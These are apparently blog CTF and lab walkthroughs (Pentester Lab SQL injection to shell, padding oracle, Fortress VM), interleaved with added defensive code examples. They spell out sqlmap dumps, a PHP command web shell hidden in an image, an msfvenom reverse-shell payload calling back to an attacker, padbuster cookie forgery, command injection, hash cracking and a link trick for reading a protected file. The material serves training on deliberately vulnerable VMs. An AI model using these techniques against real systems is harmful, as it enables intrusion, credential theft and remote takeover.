Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Today we are going to perform penetration testing with part II of the previous lab; download it from here. Now install the ISO image in VMware and start it. The task level in this lab is intermediate, and the challenge is to gain access to the administration console and then upload a PHP webshell.

Start Kali Linux, open the terminal and run the netdiscover command to scan the network. Here 192.168.1.102 is my target IP, as shown in the screenshot. Now open this IP in the browser.

When you open the target IP in the browser you get a web page with the heading My Awesome Photoblog. At the top left it has some tags: home; test; ruxcon; 2010; all pictures; admin. Now click on test.

The URL http://192.168.1.102/cat.php?id=1 runs an SQL query for ID 1. Now let us find out whether this URL is vulnerable to SQL injection by appending an apostrophe (') to the end of the URL:

http://192.168.1.102/cat.php?id=1'

This parameter is not vulnerable: I did not get any error message like the one I got in part 1. I then checked whether the other IDs were vulnerable, but found nothing there either.

Now use nikto to scan the target for vulnerabilities by typing the following command.

nikto -h 192.168.1.102

Look at the highlighted part of the screenshot: the result reports that the X-Content-Type-Options header is not set.

Then I used Acunetix to scan the target, which rated the threat level as high for blind SQL injection.

Hence it is clear that we can exploit the target through SQL injection.

Now type the following command for blind SQL injection using sqlmap:

sqlmap -u "http://192.168.1.102/cat.php?id=1" --headers="X-Forwarded-For: *" --dbs --batch

Here we try SQL injection through a header: the target application may have been designed to trust the X-Forwarded-For header, which is used when an application runs behind a reverse proxy. The asterisk marks the header value as the injection point for sqlmap.

Our assumption is correct: the header is vulnerable to SQL injection, and I obtained the database name photoblog.

Now let us fetch all the data in the photoblog database with the following command:

sqlmap -u "http://192.168.1.102/cat.php?id=1" --headers="X-Forwarded-For: *" -D photoblog --dump-all --batch

The first task was to gain access to the administration console, for which we needed the login and password of its account. Through the sqlmap command we obtained the login admin and the password P4ssw0rd.

Now use these credentials to access the administration console: open the target IP 192.168.1.102 in the browser again, click on the admin tab at the top left, and enter the login admin and the password P4ssw0rd.

Congrats!!! The first task is completed.
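The defect behind the header injection above, as an added example that is not part of the original post or of the lab's code: a visitor-logging query that concatenates the X-Forwarded-For value (the lab's behaviour, as far as sqlmap's result shows) beside the parameterised form, plus the allowlist check that rejects any header that is not a list of IP addresses. The table, the sample header values and the use of SQLite in place of the lab's database are assumptions.

```python
import ipaddress
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the photoblog database; the lab's real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visitors (ip TEXT NOT NULL, page TEXT NOT NULL)")
    return db

def log_visit_vulnerable(db, forwarded_for, page):
    # The header value is pasted into the statement text, so a quote in it rewrites the SQL.
    db.execute(f"INSERT INTO visitors (ip, page) VALUES ('{forwarded_for}', '{page}')")

def log_visit_safe(db, forwarded_for, page):
    # Bound parameters: the driver passes the value separately from the SQL text.
    db.execute("INSERT INTO visitors (ip, page) VALUES (?, ?)", (forwarded_for, page))

def apostrophe_probe(logger, header_value="10.0.0.1'"):
    # The page's apostrophe test, aimed at the header instead of the id parameter. Returns
    # what the application observes: an error, or the value stored verbatim.
    db = make_db()
    try:
        logger(db, header_value, "/cat.php?id=1")
    except sqlite3.Error:
        return "sql error"
    return db.execute("SELECT ip FROM visitors").fetchone()[0]

def valid_forwarded_for(header_value):
    # Allowlist for the only shape a reverse proxy produces: comma-separated IP literals.
    # Anything else (a quote, sqlmap's "*" marker, an empty value) is rejected before any query.
    for entry in header_value.split(","):
        try:
            ipaddress.ip_address(entry.strip())
        except ValueError:
            return False
    return True

if __name__ == "__main__":
    print(apostrophe_probe(log_visit_vulnerable))        # sql error
    print(apostrophe_probe(log_visit_safe))              # 10.0.0.1'
    print(valid_forwarded_for("10.0.0.1, 203.0.113.7"))  # True
    print(valid_forwarded_for("*"))                      # False
```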

Now the last task is to upload a PHP webshell. In the administration console you will notice a link Add a new picture for uploading an image to this web server. Click on Add a new picture to upload an image.

Here we can upload an image through the Add option; now I will try to upload a PHP webshell instead.

I tried to upload a malicious PHP file with the .php extension, with a double extension .php.jpg, and with mixed-case extensions like PHP and pHP, but every time the upload of the backdoor failed and the following web page opened.

Then I used exiftool to hide the malicious code inside a PNG image. For this step, download an image and save it on the desktop, then prepare a PHP file by typing the following code into a text file, which creates a command injection point, and save it with the .php extension; I saved it as raj.php on the desktop.

<?php $cmd = $_GET['cmd']; system($cmd); ?>

Now run exiftool to hide the PHP code inside the PNG image:

cd Desktop
exiftool "-comment<=raj.php" 1.png
exiftool 1.png

From the screenshot you can see I have three files on the desktop: the PHP file raj.php, the downloaded image kept by exiftool as 1.png_original, and the PHP webshell as 1.png.

Now I browsed to 1.png and added it as a new image; this is our PHP webshell.

Our malicious file was uploaded to the web server successfully. You can see a new row is added as webshell php, which contains our backdoor raj.php; now click on webshell php.

Here is our malicious image; right-click on it and choose View Image.

The image opens in a separate tab and, if you remember, it contains the command injection code.

Here I tried to execute the ls command by adding /cmd.php?cmd=ls/etc to the end of the URL; from the screenshot you can see that the page displays only encoded output.

The last option is to use Repeater in Burp Suite to execute the commands. Start Burp Suite, set the manual proxy in the browser, then open the web page where the "you are hacked" image is uploaded.

Now capture the request through Burp Suite and send the intercepted data to Repeater by right-clicking in its window.

Now change the request path from /show.php?id=4 to /admin/uploads/1484502823.png/cmd.php?cmd=ls and click on the Go tab to send this request; when you scroll down in the response you will find the output of the ls command.

Great!!!  We have completed both tasks.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Pentester Lab: from SQL injection to Shell VM

Today we are going to perform penetration testing in another lab; download it from here. Now install the ISO image in VMware and start it. The task in this lab is to gain access to the administration console and upload a PHP webshell.

Start Kali Linux, open the terminal and run the netdiscover command to scan the network. Here 192.168.0.105 is my target IP, as shown in the screenshot. Then open this IP in the browser.

When you open the target IP in the browser you get a web page with the heading My Awesome Photoblog. At the top left it has some tags: home; test; ruxcon; 2010; all pictures; admin. Now click on test.

The URL http://192.168.1.105/cat.php?id=1 runs a query for ID 1. Now let us find out whether this URL is vulnerable to SQL injection by appending an apostrophe (') to the end of the URL:

http://192.168.1.105/cat.php?id=1'

And I got an SQL error message.

This confirms that the web page suffers from an SQL injection vulnerability. Now I will use the sqlmap tool to enumerate the database name and then fetch all the data in that database. First, type the following command to enumerate the database name:

sqlmap -u "192.168.0.105/cat.php?id=1" --dbs

If you remember, the title of the web page was "My Awesome Photoblog", so the name of the database should be photoblog.

Now let us fetch all the data in the photoblog database with the following command:

sqlmap -u "192.168.0.105/cat.php?id=1" -D photoblog --dump-all

The first task was to gain access to the administration console, for which we needed the login and password of its account. Through the sqlmap command we obtained the login admin and the password P4ssw0rd.

Now use these credentials to access the administration console: open the target IP 192.168.0.105 in the browser again, click on the login tab and enter the login admin and the password P4ssw0rd.

Congrats!!! The first task is completed.

Now the last task is to upload a PHP webshell. In the administration console you will see a link Add a new picture for uploading an image to this web server. Click on Add a new picture to upload an image.

Here we can upload an image through the Add option; now I will try to upload a PHP webshell instead of a picture.

Let us prepare the malicious file to upload with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with the .pHP extension. I saved the backdoor as shell.pHP on the desktop and will later browse to this file to upload it to the web server.

Now load the Metasploit framework by typing msfconsole and start multi/handler.

Move back to the admin account, give the title "shell", click on browse to select shell.pHP and then click on Add.

Note: the upload is rejected if you save the file as shell.php, so use capital letters in the extension, like PHP or pHP.

Our malicious file was uploaded to the web server successfully. You can see a new row is added as shell, which contains our backdoor shell.pHP; now, to execute the backdoor, click on shell and you will get a reverse connection at the multi handler.

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > exploit
meterpreter > sysinfo

Wonderful!!! We completed our last challenge too; here we have the victim's web shell.
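A check that closes the gaps both uploads exploited (the .pHP case bypass here, and the double extension and exiftool comment tricks in part II), added as an example that is not part of either post or of the lab's code: the name-only, case-sensitive deny list that the part I behaviour suggests, beside an allowlist that normalises case, permits one extension, verifies the image's magic bytes and refuses metadata carrying PHP open tags. The magic-byte table and the sample upload bytes are constructed.

```python
import re
import uuid

# Magic bytes each allowed image type must start with (constructed table for this example).
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
PHP_TAGS = (b"<?php", b"<?=")

def allowed_vulnerable(filename):
    # Matches what part I showed: a case-sensitive deny list on the name alone, so ".php" is
    # refused while ".pHP" passes (part II's lab checks more, yet still took PHP inside a PNG).
    return not filename.endswith(".php")

def allowed_hardened(filename, content):
    # Name: exactly one extension, lower-cased and matched against an allowlist, so
    # shell.pHP and raj.php.jpg are refused before the content is even examined.
    base = filename.rsplit("/", 1)[-1]
    parts = base.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        return False
    ext = parts[1]
    if ext not in IMAGE_MAGIC or not content.startswith(IMAGE_MAGIC[ext]):
        return False
    # Content: metadata (the PNG/EXIF comment exiftool writes) must not carry PHP open tags.
    # Re-encoding the image server-side is the stronger control; this is the cheap one.
    return not any(tag in content for tag in PHP_TAGS)

def storage_name(filename):
    # Never reuse the client's name on disk: a server-generated name plus the vetted extension,
    # stored in a directory where the web server is configured not to execute scripts.
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{uuid.uuid4().hex}.{ext}"

# Constructed sample uploads mirroring the attempts described in both posts.
PNG_CLEAN = IMAGE_MAGIC["png"] + b"\x00\x00\x00\rIHDR" + b"\x00" * 32
PNG_WITH_SHELL = PNG_CLEAN + b"tEXtComment\x00<?php /* web shell body */ ?>"
PHP_SHELL = b"<?php /* reverse_tcp stager body */ die(); ?>"
```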


Hack the Padding Oracle Lab

The main purpose of solving this lab is to share the padding oracle attack technique with our visitors.

The padding oracle attack enables an attacker to decrypt encrypted data without knowledge of the encryption key and the cipher used, by sending skillfully manipulated cipher texts to the padding oracle and observing the results returned by it. This causes loss of confidentiality of the encrypted data. E.g. in the case of session data stored on the client side, the attacker can gain information about the internal state and structure of the application. A padding oracle attack also enables an attacker to encrypt arbitrary plain texts without knowledge of the key and cipher used. If the application assumes that integrity and authenticity of the decrypted data is given, an attacker could be able to manipulate internal session state and possibly gain higher privileges.

www.owasp.org/index.php/Testing_for_Padding_Oracle

First you need to download the padding oracle lab from here. Now install the ISO image in VMware and start it.

Start Kali Linux and open the target IP 192.168.1.29 in the browser. At this point you need to create a user account: click on the register option.

Now register a username with a password and then log in to exploit this vulnerability. I registered as raj:123.

Once you have created a user account, go to the login panel and at the same time use Burp Suite to capture the cookies.

Start Burp Suite and do not forget to set the manual proxy in your browser. Now open the Proxy tab and turn Intercept on to capture the request to the target. When this is done you will see the captured data in the Intercept window. Here you can see that I try to log in with the credentials raj:123.

Now right-click in the window and a list of options appears; click on Send to Repeater. Look at the screenshot: there are two panels, left and right, for the request and the response respectively.

In the left panel send username raj and password 123 as the request and click on the Go button to forward it; the response in the right panel contains the generated auth cookie.

Copy the highlighted cookie; it is used in the command below.

Next open a terminal and run the following command, which contains the target URL plus the cookie copied above:

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 --cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG --encoding 0

PadBuster is an automated script for performing padding oracle attacks, developed by Brian Holyfield of Gotham Digital Science; python-paddingoracle is a Python implementation heavily based on it. The command above (the third argument, 8, is the cipher block size) decrypts the encrypted value of auth into plaintext. When it asks which ID to use, type 2 for the recommended one.

The last part of the screenshot shows the decrypted value in three forms: Base64, HEX and ASCII. The auth cookie is a combination of the username with its password; from padbuster we learn the plaintext that was encrypted for the username raj.

We are very near our goal: we just need to encrypt an auth cookie with the user set to admin. Here our plaintext is user=admin, and we encrypt it using padbuster:

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 --cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG --encoding 0 --plaintext user=admin

Again type 2 when it asks which ID to use.

Here the highlighted part is our encrypted value for admin. Copy it: "BAit——–AAAA".

Go to Burp Suite once again and click on Params under the Intercept frame; it contains two fields, username and password. Now add a third field for the auth value: click on the Add button on the right side of the frame, which adds another row to the params.

It has three columns: type, name and value. Enter the encrypted value obtained from padbuster as type: cookie, name: auth, value: BAit——AAAAAA. Then click on Forward to send this request to the web server.

Click on Forward again to send it.

Once Burp Suite has forwarded the request to the web server, you will be logged in to the admin account.

Congrats!!! We have met the goal of this lab.
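The mechanism behind the padbuster steps above, and the fix for it, as an added example that is not part of the original post or of the lab's code: a CBC-encrypted cookie whose decryption answers differently on bad padding (the oracle the OWASP text describes), beside an encrypt-then-MAC version that rejects every tampered token identically, so the user=admin forgery would need the MAC key. The block cipher is an assumed 4-round Feistel stand-in with 8-byte blocks, and the keys and cookie contents are constructed.

```python
import hashlib, hmac, os
BLOCK = 8  # 8-byte blocks, the block size given to padbuster above

def _xor(a, b): return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, i):  # round function of a constructed 4-round Feistel cipher (a stand-in, not the lab's)
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def block_encrypt(key, block):
    l, r = block[:4], block[4:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r

def block_decrypt(key, block):
    l, r = block[:4], block[4:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r

def unpad(data):  # PKCS#7 check: the test whose outcome the oracle leaks
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, plaintext):
    n = BLOCK - len(plaintext) % BLOCK
    padded, out = plaintext + bytes([n]) * n, [os.urandom(BLOCK)]  # PKCS#7 pad, random IV
    for i in range(0, len(padded), BLOCK):
        out.append(block_encrypt(key, _xor(padded[i:i + BLOCK], out[-1])))
    return b"".join(out)  # IV || C1 || C2 ...

def cbc_decrypt(key, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return unpad(b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:])))

def vulnerable_oracle(key, cookie):  # the lab's behaviour: a padding failure is distinguishable
    try:
        cbc_decrypt(key, cookie)
        return "ok"
    except ValueError:
        return "padding error"

def seal(enc_key, mac_key, plaintext):  # encrypt-then-MAC over IV and ciphertext
    ct = cbc_encrypt(enc_key, plaintext)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()

def hardened_oracle(enc_key, mac_key, token):
    ct, tag = token[:-32], token[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, ct, hashlib.sha256).digest()):
        return None  # one generic rejection, decided before any decryption happens
    try:
        return cbc_decrypt(enc_key, ct)
    except ValueError:
        return None

def probe(oracle, token, pos):  # attacker's view: distinct responses as byte `pos` takes every other value
    return {oracle(token[:pos] + bytes([v]) + token[pos + 1:]) for v in range(256) if v != token[pos]}
```

Varying the last byte of the first ciphertext block gives the vulnerable oracle two distinguishable answers (one of the 255 tweaks yields valid 0x01 padding); the MAC-checked version gives the same answer for all of them.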


Hack the Fortress VM (CTF Challenge)

Previously you have breached many Vulnhub CTFs; today we will try to breach the Fortress Vulnhub CTF.

Download it from here. Start Kali Linux and follow these steps.

Open a terminal in Kali Linux and run this command.

netdiscover

This command scans your network and gives you the victim IP: 192.168.0.105

Now scan this IP aggressively with the Nmap tool, as shown in the image below.

nmap -p- -A 192.168.0.105

This shows the open ports and the services running on them. As shown, ports 22, 80 and 443 are open, which gives us a way to penetrate further.

Open the IP in the browser by typing 192.168.0.105 in the URL bar and you will get this kind of web page in the browser window.

After a lot of effort I decided to use DirBuster to look inside the target's directories. Type dirbuster in the terminal and the OWASP DirBuster window opens automatically. Browse for your dictionary in /usr/share/dirbuster/wordlists and choose an appropriate wordlist (I selected medium.txt); do not forget to enter the target URL in the text field at the top as http://192.168.0.105, and finally hit the Start button.

Luckily!!! I found something: the file scanner.php.

Now visit this page in the browser by opening the URL http://192.168.0.105/scanner.php and have a look at this colourful page. It asks for a target IP to scan, which looks very much like an OS command injection point. I tried to breach it with several kinds of command injection, but with no luck: everything seemed wasted here.

But when I entered the localhost IP, we got the result of an Nmap scan, which you can see in the image below.

Now start Burp Suite and do not forget to set the manual proxy in your browser. Click on the Proxy tab and turn Intercept on to capture the request to the target. When this is done you will see the captured data in the Intercept window.

Now right-click in the window and an action list like this appears; click on Send to Repeater.

This means I can now try to execute through Repeater the commands that failed when I entered them on the web page.

Look at the screenshot: there are two panels, left and right, for the request and the response respectively.

Type ls as the request and click on the Go tab. This generates the response to the request you made.

Request: ls

Response: index.html
          k1ngd0m_k3yz
          logo.png
          s1kr3t
          scanner.php
          styles.css

Awesome!!! It shows a list of files and directories.

Now make another request using the command ls k1ngd0m_k3yz; the response to this command lists two entries, master and passwd. Now go through them one by one.

Request: ls k1ngd0m_k3yz

Response: master
          passwd

Now repeat the process of making a request and getting a response through Repeater, up to the last step.

Request: cat k1ngd0m_k3yz/master

Response: craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

Save the highlighted response with leafpad as hash.txt on the desktop.

Request: cat k1ngd0m_k3yz/passwd

Response: craven:*:1002:1002:User &:/home/craven:/bin/sh

Request: ls s1kr3t

Response: flag.txt

Request: cat s1kr3t/flag.txt

Response: FLAG{n0_one_br3aches_teh_f0rt}

Nice!!! We have caught our very first FLAG.
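How scanner.php's input could be handled, as an added example that is not part of the original post or of the VM: the target spliced into a shell string (the flaw the Repeater requests above exploit) beside a version that accepts only an IP literal and runs the tool without a shell, with a metacharacter check that can also be run over logged request parameters as a detection. echo stands in for the VM's nmap call so the block runs anywhere, and the handler's shape is assumed.

```python
import ipaddress
import re
import subprocess

META = re.compile(r"[;&|`$<>(){}\n\r]")  # shell metacharacters that never belong in an IP field

def scan_vulnerable(target):
    # scanner.php style: the submitted target is spliced into a shell command line.
    # echo stands in for nmap; /bin/sh parses ; | $( ) in the string exactly as it would
    # for the real command, so a second command rides along with the scan.
    cmd = f"echo scanning {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def scan_hardened(target):
    # 1. Allowlist the input: only an IP literal is accepted (ValueError otherwise).
    ip = ipaddress.ip_address(target.strip())
    # 2. No shell: argv is passed as a list, so metacharacters are never interpreted.
    argv = ["echo", "scanning", str(ip)]
    return subprocess.run(argv, capture_output=True, text=True).stdout

def looks_like_injection(target):
    # Detection hook for access logs or a WAF: shell metacharacters in a field that
    # should only ever hold an IP address. Complements, never replaces, the allowlist.
    return META.search(target) is not None

def handle_scan_request(target):
    # Request handler returning (http_status, body); rejected input is worth logging.
    if looks_like_injection(target):
        return 400, "rejected: shell metacharacters in target"
    try:
        return 200, scan_hardened(target)
    except ValueError:
        return 400, "rejected: target must be a single IP address"
```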

Now find the other flags using the find command.

Request: find / -name flag.txt

Response: /usr/local/www/apache24/data/s1kr3t/flag.txt
          /usr/home/vulnhub/flag.txt
          /usr/home/craven/flag.txt

Request: ls -lah /usr/home/craven

Response: drwxr-xr-x  2 craven  craven   512B Nov  9 19:58 .
          drwxr-xr-x  4 root    wheel    512B Nov  5 01:59 ..
          -rw-r--r--  1 craven  craven   1.0K Nov  5 01:59 .cshrc
          -rw-------  1 craven  craven     5B Nov  7 20:24 .gdb_history
          -rw-r--r--  1 craven  craven    60B Nov  7 20:36 .gdbinit
          -rw-r--r--  1 craven  craven   254B Nov  5 01:59 .login
          -rw-r--r--  1 craven  craven   163B Nov  5 01:59 .login_conf
          -rw-------  1 craven  craven   379B Nov  5 01:59 .mail_aliases
          -rw-r--r--  1 craven  craven   336B Nov  5 01:59 .mailrc
          -rw-r--r--  1 craven  craven   802B Nov  5 01:59 .profile
          -rw-------  1 craven  craven   281B Nov  5 01:59 .rhosts
          -rw-r--r--  1 craven  craven   978B Nov  5 01:59 .shrc
          -r--------  1 craven  craven    46B Nov  6 01:30 flag.txt
          -rw-r--r--  1 craven  craven   119B Nov  5 02:23 hint.txt
          -rw-r--r--  1 craven  craven    77B Nov  5 02:20 reminders.txt

Request: cat /usr/home/craven/reminders.txt

Response: To buy:
          * skim milk
          * organic free-run eggs
          * dog bone for qwerty
          * sriracha

Request: cat /usr/home/craven/hint.txt

Response: Keep forgetting my password, so I made myself a hint. Password is three digits followed by my pet's name and a symbol.

Crunch is a wordlist generator that can use a standard character set or one you specify, and it can generate all possible combinations and permutations.

Run the crunch command in the terminal as crunch 10 10 -t %%%qwerty^ > pass.txt (in the pattern, % stands for a digit and ^ for a symbol, matching the hint).

Now crack the password by typing the following commands in the terminal:

cd Desktop
john --wordlist=pass.txt hash.txt

931qwerty? is the password for craven, as you can see from the screenshot.

If you remember, the nmap result showed that port 22 is open; now try to connect to the target through SSH using the credentials above.

ssh craven@192.168.0.105

$ pwd
/usr/home/craven
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

Wonderful!!! We have caught the second FLAG as well.

$ cd /home/vulnhub
$ pwd
/home/vulnhub
$ ls
flag.txt  reader
$ cat flag.txt
cat: flag.txt: Permission denied
$ ./reader
./reader [file to read]
$ ./reader flag.txt

Here it does not give access to read this file.

Now move to the tmp folder to read flag.txt.

$ cd /tmp
$ ls
$ ln /home/vulnhub/flag.txt raj
$ cd /home/vulnhub
$ ./reader /tmp/raj
FLAG{its_A_ph0t0_ph1ni5h}

Great!!! We have met the goal by capturing all three flags; this last FLAG is the third.

The ln command is a Linux command used to create a link to the file TARGET with the name LINKNAME. To read more, visit http://www.computerhope.com/unix/uln.htm

